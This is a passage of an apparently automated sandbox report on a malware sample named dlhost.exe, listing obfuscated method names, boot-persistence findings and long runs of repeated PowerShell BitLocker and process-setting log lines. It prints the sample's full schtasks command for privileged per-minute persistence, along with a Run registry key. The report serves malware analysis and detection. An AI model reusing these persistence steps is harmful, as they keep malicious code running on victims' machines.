'Tm5a0hPfTEPH5f6lfWjlWiPOSuCITHP4AYeeOOv5v1cIybTqwBBvqX7wPDuOuS0wdOnXDCQQVxpEOUf03WELDlujPcP', 'a9naJKyD73Bid7xsZ3nXVMd1rh9ayH7EWAi2wr9swh5qcnv7TtpvnMKPfkM0XCCGVhke8tihPJlxsgGtuG6oCjFgS6Q'
                    Source: dlhost.exe.0.dr, QVV40VdefjdAZinBcVlX2xoxzxFyfGlyuJtdjIjlQEwy7g.csHigh entropy of concatenated method names: 'rS2aT05JaHqvyqSAqKZt5Mvp6AczY95MVZflSMhVL85z6Q', 'VY6BuyqiS5Ttj5ZstOicqeuYH0WKJUknG45P1n1bDhcVOm', 'TKB8DuAp8jUwNqakzCoVxrW8X3wWRGrYgVoukS8lwJ76mi', 'aHXWoVQa6qR87w9oZgmpwIGQfNarwjSLmL9OCnFlAHfOG9', 'TQhQM3tae3Kokhs99E5XOwhs5cUtcdUw1ZNuBQTFhYhVOD', 'sXDZPSA9RtuP5RTrl5yZHl6L1HE8oDZKXmtajP2YVdT29Z', 'i1jQwlCGq2DU7A9B8Vek6ITf1XOvJEi9J82SQZj0DIkUp2', '_3sPmU6ZG7v0uPlT7esH76PHhOdRtqVg6DuCJkgTTftF3Eu', '_62OyhQpzcrE1VaxsKy4tcb9A6BFpzn4EJRxwbKQVU2NTxe', 'mJJoKaUMdIsAejoG0wWYp5uBLMEYqNeYLZC83QrrNpPpmw'
                    Source: C:\Users\user\Desktop\dlhost.exeFile created: C:\Users\user\dlhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\dlhost.exeFile created: C:\Users\user\dlhost.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Users\user\Desktop\dlhost.exeFile created: C:\Users\user\dlhost.exeJump to dropped file
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\user\dlhost.exe"
                    Source: C:\Users\user\Desktop\dlhost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dlhostJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dlhostJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
